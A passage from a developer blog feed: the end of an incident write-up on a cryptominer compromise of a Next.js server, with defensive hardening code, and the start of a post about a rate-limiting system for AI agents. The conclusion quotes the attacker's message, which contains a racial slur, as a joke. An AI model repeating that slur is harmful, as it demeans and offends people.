&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run as non-root user (already implemented)&lt;/span&gt;
&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; nextjs&lt;/span&gt;

&lt;span class="c"&gt;# Limit resources&lt;/span&gt;
deploy:
  resources:
    limits:
      cpus: '1.0'
      memory: 512M
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;→ ✅ &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/34" rel="noopener noreferrer"&gt;Issue #34 - docker-compose: add CPU and memory resource limits for backend &amp;amp; frontend&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  2. &lt;strong&gt;Network Security&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# docker-compose.yml - Add network isolation&lt;/span&gt;
&lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;frontend&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;driver&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bridge&lt;/span&gt;
  &lt;span class="na"&gt;backend&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;driver&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bridge&lt;/span&gt;
    &lt;span class="na"&gt;internal&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;  &lt;span class="c1"&gt;# No internet access for backend&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;→ 🔥 &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/40" rel="noopener noreferrer"&gt;Issue #40 - docker-compose: add network isolation between frontend and backend containers&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  3. &lt;strong&gt;Nginx Rate Limiting&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight nginx"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Prevent automated attacks&lt;/span&gt;
&lt;span class="k"&gt;limit_req_zone&lt;/span&gt; &lt;span class="nv"&gt;$binary_remote_addr&lt;/span&gt; &lt;span class="s"&gt;zone=api:10m&lt;/span&gt; &lt;span class="s"&gt;rate=10r/s&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;location&lt;/span&gt; &lt;span class="n"&gt;/api/&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kn"&gt;limit_req&lt;/span&gt; &lt;span class="s"&gt;zone=api&lt;/span&gt; &lt;span class="s"&gt;burst=20&lt;/span&gt; &lt;span class="s"&gt;nodelay&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;→ 🔥 &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/33" rel="noopener noreferrer"&gt;Issue #33 - nginx: add security headers, rate limiting, and request size limit&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  4. &lt;strong&gt;Input Validation (Critical)&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SECURE CODE - Never execute user input directly&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;zod&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// Define strict schema&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;schema&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;object&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;enum&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;allowed&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;actions&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;only&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]),&lt;/span&gt;
  &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;z&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;string&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;max&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;regex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/^&lt;/span&gt;&lt;span class="se"&gt;[&lt;/span&gt;&lt;span class="sr"&gt;a-zA-Z0-9&lt;/span&gt;&lt;span class="se"&gt;]&lt;/span&gt;&lt;span class="sr"&gt;+$/&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;POST&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

  &lt;span class="c1"&gt;// Validate input&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;safeParse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;success&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;Response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Invalid input&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;400&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="c1"&gt;// Never use exec/spawn with user input&lt;/span&gt;
  &lt;span class="c1"&gt;// Use safe alternatives or predefined operations&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;→ ✅ &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/29" rel="noopener noreferrer"&gt;Issue #29 - backend: enhance chatbot input validation for shell/metacharacters&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  5. &lt;strong&gt;Monitoring &amp;amp; Alerting&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Set up container resource monitoring&lt;/span&gt;
docker stats frontend_app

&lt;span class="c"&gt;# Alert on high CPU usage&lt;/span&gt;
&lt;span class="c"&gt;# (Implement monitoring solution like Prometheus, Grafana, etc.)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;→ 🔥 &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/39" rel="noopener noreferrer"&gt;Issue #39 - monitoring: set up container resource monitoring and alerts&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  6. CORS restrictions
&lt;/h4&gt;

&lt;p&gt;Production CORS in &lt;code&gt;backend/src/index.ts&lt;/code&gt; currently restricts origins to &lt;code&gt;http://localhost:3000&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Update the following in &lt;code&gt;src/index.ts&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;corsOptions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;origin&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;config&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;nodeEnv&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;production&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; 
    &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https://luisfaria.dev&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="c1"&gt;// ✅ add production domain&lt;/span&gt;
    &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;http://localhost:3000&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;→ ✅ &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/32" rel="noopener noreferrer"&gt;Issue 32 - backend: fix CORS configuration for production&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Final Tips
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Prevention Checklist
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;[X] &lt;strong&gt;Never execute user input directly&lt;/strong&gt; - This is the #1 rule&lt;/li&gt;
&lt;li&gt;[X] &lt;strong&gt;Input validation&lt;/strong&gt; - Use strict schemas (Zod, Joi, etc.)&lt;/li&gt;
&lt;li&gt;[X] &lt;strong&gt;Dependency updates&lt;/strong&gt; - Run &lt;code&gt;npm audit&lt;/code&gt; regularly &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/30" rel="noopener noreferrer"&gt;frontend npm audit&lt;/a&gt; &amp;amp; &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/31" rel="noopener noreferrer"&gt;backend npm audit&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;[X] &lt;strong&gt;Least privilege&lt;/strong&gt; - Run containers as non-root users (Dockerfile: &lt;code&gt;USER nextjs&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;[X] &lt;strong&gt;Resource limits&lt;/strong&gt; - Prevent resource exhaustion &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/34" rel="noopener noreferrer"&gt;Issue #34&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;[X] &lt;strong&gt;Regular security audits&lt;/strong&gt; - Review code for vulnerabilities&lt;/li&gt;
&lt;li&gt;[X] &lt;strong&gt;Keep Next.js updated&lt;/strong&gt; - Security patches are released regularly&lt;/li&gt;
&lt;li&gt;[ ] &lt;strong&gt;Rate limiting&lt;/strong&gt; - Prevent brute force attacks &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/33" rel="noopener noreferrer"&gt;Issue #33&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;[ ] &lt;strong&gt;Network isolation&lt;/strong&gt; - Limit container internet access&lt;/li&gt;
&lt;li&gt;[ ] &lt;strong&gt;Logging &amp;amp; monitoring&lt;/strong&gt; - Detect anomalies early &lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/35" rel="noopener noreferrer"&gt;Issue #35&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Red Flags to Watch For
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;🚩 Unexpected CPU spikes
&lt;/li&gt;
&lt;li&gt;🚩 Unusual network connections
&lt;/li&gt;
&lt;li&gt;🚩 Slow container response times
&lt;/li&gt;
&lt;li&gt;🚩 Multiple timeout errors in logs
&lt;/li&gt;
&lt;li&gt;🚩 Unknown processes in &lt;code&gt;ps aux&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;🚩 Files in &lt;code&gt;/tmp/&lt;/code&gt; you didn't create
&lt;/li&gt;
&lt;li&gt;🚩 Suspicious POST requests in access logs
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Learning Resources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://owasp.org/www-project-top-ten/" rel="noopener noreferrer"&gt;OWASP Top 10&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nextjs.org/docs/app/building-your-application/deploying/security" rel="noopener noreferrer"&gt;Next.js Security Best Practices&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html" rel="noopener noreferrer"&gt;Docker Security Cheat Sheet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nodejs.org/en/docs/guides/security/" rel="noopener noreferrer"&gt;Node.js Security Best Practices&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Key Takeaways
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Never trust user input&lt;/strong&gt; - Always validate and sanitize&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Defense in depth&lt;/strong&gt; - Multiple security layers (Docker, nginx, app-level)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor everything&lt;/strong&gt; - Logs saved my ass in this incident&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automate security&lt;/strong&gt; - CI/CD with automated security scanning&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stay updated&lt;/strong&gt; - Regular dependency and framework updates&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;This incident was a valuable learning experience demonstrating how quickly automated attacks can compromise vulnerable applications. The attack was detected relatively quickly due to visible performance degradation, and Docker's sandboxing prevented host-level compromise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The attacker's "my nuts itch nigga" message&lt;/strong&gt; served as an inadvertent calling card, making the attack logs memorable (🤣) and providing a clear marker during investigation.&lt;/p&gt;

&lt;p&gt;The primary lesson: &lt;strong&gt;Never execute unsanitized user input.&lt;/strong&gt; This single vulnerability can turn your server into someone else's cryptocurrency mining rig.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Status:&lt;/strong&gt; ✅ Incident resolved, system rebuilt, monitoring enhanced, awaiting code audit completion.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>nextjs</category>
      <category>docker</category>
      <category>react</category>
    </item>
    <item>
      <title>Building IRL: From a $50k AWS Horror Story to Human-Centered AI Governance</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Tue, 09 Dec 2025 03:33:08 +0000</pubDate>
      <link>https://forem.com/lfariaus/building-irl-from-a-50k-aws-horror-story-to-human-centered-ai-governance-1jdg</link>
      <guid>https://forem.com/lfariaus/building-irl-from-a-50k-aws-horror-story-to-human-centered-ai-governance-1jdg</guid>
      <description>&lt;p&gt;&lt;strong&gt;From runaway agents to responsible governance—how I turned academic research into a production-ready rate limiting system.&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"The design choices we make today will determine whether autonomous AI amplifies human capability—or undermines it."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  The Origin Story: Why I Built This
&lt;/h2&gt;

&lt;p&gt;What happens when you give an AI agent your credit card and tell it to "solve this problem autonomously"?&lt;/p&gt;

&lt;p&gt;For one developer, it meant waking up to a &lt;strong&gt;$50,000 AWS bill&lt;/strong&gt;. &lt;a href="https://levelup.gitconnected.com/we-moved-everything-to-aws-and-our-bill-hit-50k-month-4b01e8e3c930" rel="noopener noreferrer"&gt;Reference&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That's not a hypothetical horror story. It's a real incident I documented during my research—and it's the reason I spent the last trimester building the &lt;strong&gt;Intelligent Rate Limiting (IRL) System&lt;/strong&gt; at Torrens University Australia under &lt;strong&gt;&lt;a href="https://au.linkedin.com/in/omid-haass" rel="noopener noreferrer"&gt;Dr. Omid Haas&lt;/a&gt;&lt;/strong&gt; in the Human-Centered Design (HCD402) subject.&lt;/p&gt;

&lt;p&gt;But here's the thing: &lt;strong&gt;rate limiting isn't just a technical problem. It's a human problem.&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Can we build governance systems that talk &lt;em&gt;with&lt;/em&gt; developers, not &lt;em&gt;at&lt;/em&gt; them?&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6ocy18whu68iwlj0bh7t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6ocy18whu68iwlj0bh7t.png" alt="Figure 1: Google Trends Interest over time" width="800" height="470"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 1: Google Trends Interest over time on "ai agent" (Jan 2023 – Oct 2025). Source: &lt;a href="https://trends.google.com/trends/explore?date=2023-01-01%202025-10-16&amp;amp;geo=AU&amp;amp;q=ai%20agent&amp;amp;hl=en" rel="noopener noreferrer"&gt;Google Trends&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;That question drove the entire project.&lt;/p&gt;




&lt;h2&gt;
  
  
  🤖 What Is IRL?
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;IRL&lt;/strong&gt; (Intelligent Rate Limiting) is a middleware layer for autonomous AI agents that provides:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Visibility&lt;/strong&gt;: Real-time dashboard of quotas, carbon footprint, and cost projections&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Feedback&lt;/strong&gt;: Contrastive explanations—&lt;em&gt;why blocked&lt;/em&gt; + &lt;em&gt;how to succeed&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fairness&lt;/strong&gt;: Weighted allocation so students and startups aren't crushed by enterprise defaults&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Accountability&lt;/strong&gt;: Immutable audit logs with hashed entries for every decision&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sustainability&lt;/strong&gt;: Carbon-aware throttling that defers non-urgent work during high-emission windows&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Traditional rate limiters say &lt;code&gt;HTTP 429 Too Many Requests&lt;/code&gt;. IRL says:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Request #547 blocked – exceeds daily energy threshold.
Current: 847 kWh / Limit: 850 kWh.
Reset in 25 minutes.

Options:
→ Request override (2 escalations remaining)
→ Schedule for low-carbon window (4:00 AM)
→ Reduce task priority to continue at lower quota
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's the difference between a &lt;strong&gt;wall&lt;/strong&gt; and a &lt;strong&gt;coach&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0s0njh2cx8ifti6rx9eb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0s0njh2cx8ifti6rx9eb.png" alt="Figure 2 – Conceptual Flow of IRL System" width="800" height="796"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 2: Conceptual flow of the Intelligent Rate-Limiting System – from agent request to governed response.&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The 12-Week Journey
&lt;/h2&gt;

&lt;p&gt;The subject covered 12 weeks across three progressive assessments:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Week&lt;/th&gt;
&lt;th&gt;Assessment&lt;/th&gt;
&lt;th&gt;Focus&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Weeks 1-4&lt;/td&gt;
&lt;td&gt;Assessment 1&lt;/td&gt;
&lt;td&gt;AI Recommendation Systems &amp;amp; Transparency Crisis&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Weeks 5-8&lt;/td&gt;
&lt;td&gt;Assessment 2&lt;/td&gt;
&lt;td&gt;Agentic AI Failure Modes &amp;amp; Problem Space&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Weeks 9-12&lt;/td&gt;
&lt;td&gt;Assessment 3&lt;/td&gt;
&lt;td&gt;IRL System Design &amp;amp; Implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Each assessment wasn't a random task—they naturally built toward the final system.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;Assessment 1: The Spark&lt;/strong&gt; &lt;em&gt;(Research Presentation)&lt;/em&gt;
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Outcome:&lt;/strong&gt; Understanding how opaque AI erodes user agency&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;My journey into AI governance started innocently enough with a research presentation on AI recommendation systems. I explored how platforms like Netflix and Spotify shape our choices—but also how they can trap us in filter bubbles.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Challenge:&lt;/strong&gt; Deliver a 10-minute presentation analyzing the evolution of a technology through a human-centered lens.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why It Matters:&lt;/strong&gt; When AI systems lack transparency and human oversight, they undermine user agency. This seeded IRL's &lt;strong&gt;Visibility&lt;/strong&gt; pillar—the idea that users deserve to &lt;em&gt;see&lt;/em&gt; what their AI is doing.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;Key Insight:&lt;/strong&gt; Opaque systems erode trust. If users can't understand &lt;em&gt;why&lt;/em&gt; a decision was made, they can't meaningfully consent to it.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpvbix7e9udigj1shg8re.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpvbix7e9udigj1shg8re.png" alt="Figure 3 – Paradox of Technology" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 3: The Paradox of Technology – Convenience vs Complexity. As AI systems become more capable, the gap between user understanding and system behavior widens.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-HCD/assignments/Assessment1/HCD402_Faria_L_Assessment_1_SlideDeck_vf.pdf" rel="noopener noreferrer"&gt;📊 VIEW PRESENTATION&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;Assessment 2: Identifying the Problem&lt;/strong&gt; &lt;em&gt;(2000-word Report)&lt;/em&gt;
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Outcome:&lt;/strong&gt; Documenting the Agentic AI Crisis&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;For my second assessment, I dove deep into the emerging world of &lt;strong&gt;Agentic AI&lt;/strong&gt;—autonomous agents like AutoGPT, Devin, and GPT-Engineer that don't wait for commands and &lt;em&gt;act independently&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Challenge:&lt;/strong&gt; Write a 2000-word report identifying a human-centered problem in emerging technology and proposing a solution framework.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The 2000-word report uncovered four critical failure modes:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Failure Mode&lt;/th&gt;
&lt;th&gt;Evidence&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Technical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Cascading API failures, infinite retry loops&lt;/td&gt;
&lt;td&gt;$15k-$50k overnight bills&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Environmental&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Continuous workloads with zero carbon awareness&lt;/td&gt;
&lt;td&gt;800kg CO₂/month per deployment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Human&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;47,000+ Stack Overflow questions on opaque throttling&lt;/td&gt;
&lt;td&gt;Developer confusion &amp;amp; frustration&lt;/td&gt;
&lt;/tr&gt;
